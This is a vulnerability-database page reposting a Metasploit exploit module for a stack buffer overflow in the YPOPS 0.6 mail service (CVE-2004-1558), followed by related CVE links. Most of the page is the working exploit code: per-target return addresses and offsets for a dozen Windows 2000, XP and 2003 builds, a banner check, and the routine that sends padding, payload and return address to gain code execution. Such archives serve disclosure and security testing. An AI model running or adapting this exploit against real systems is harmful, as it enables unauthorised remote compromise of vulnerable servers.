Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAcaroPACKETSTORM:83157
HistoryNov 26, 2009 - 12:00 a.m.

YPOPS 0.6 Buffer Overflow

2009-11-2600:00:00
acaro
packetstormsecurity.com
14

0.711 High

EPSS

Percentile

98.1%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Smtp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'YPOPS 0.6 Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the YPOPS POP3  
service.  
  
This is a classic stack overflow for YPOPS version 0.6.  
Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to  
jmp ebx opcode in ws_32.dll  
  
},  
'Author' => [ 'acaro <[email protected]>' ],  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2004-1558'],  
[ 'OSVDB', '10367'],  
[ 'BID', '11256'],  
[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],  
  
],  
'Platform' => 'win',  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1200,  
'BadChars' => "\x00\x25",  
'MinNops' => 106,  
  
},  
'Targets' =>   
[  
[ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],  
[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],  
[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],  
[ 'Windows 2000 SP0 English', { 'Ret' => 0x75036113, 'Offset' => 503 }, ],  
[ 'Windows 2000 SP1 English', { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],  
[ 'Windows 2000 SP2 English', { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],  
[ 'Windows 2000 SP3 English', { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],  
[ 'Windows 2000 SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],  
[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],  
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],  
[ 'Windows 2003 SP0 English', { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],  
[ 'Windows 2003 SP1 English', { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],  
],  
'DisclosureDate' => 'Sep 27 2004'))  
end  
  
def check  
connect  
disconnect  
  
banner.gsub!(/\n/, '')  
  
if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/  
print_status("Vulnerable SMTP server: #{banner}")  
return Exploit::CheckCode::Detected  
end  
  
print_status("Unknown SMTP server: #{banner}")  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
pattern =   
rand_text_alpha(target['Offset'] - payload.encoded.length) +  
payload.encoded +  
[target.ret].pack('V') +   
"\n"  
  
print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")  
  
sock.put(pattern)  
  
handler  
disconnect  
end  
  
end  
`

Related

nvd 2
cve 2
cvelist 2
prion 1
nvd
nvd
CVE-2004-1558
2004-12-31 05:00:00
CVE-2024-24736
2024-01-29 04:15:07
cve
cve
CVE-2004-1558
2005-02-20 05:00:00
CVE-2024-24736
2024-01-29 04:15:07
cvelist
cvelist
CVE-2004-1558
2005-02-20 05:00:00
CVE-2024-24736
2024-01-29 00:00:00
prion
prion
Design/Logic Flaw
2024-01-29 04:15:00

0.711 High

EPSS

Percentile

98.1%

JSON
Related for PACKETSTORM:83157
nvd2cve2cvelist2prion1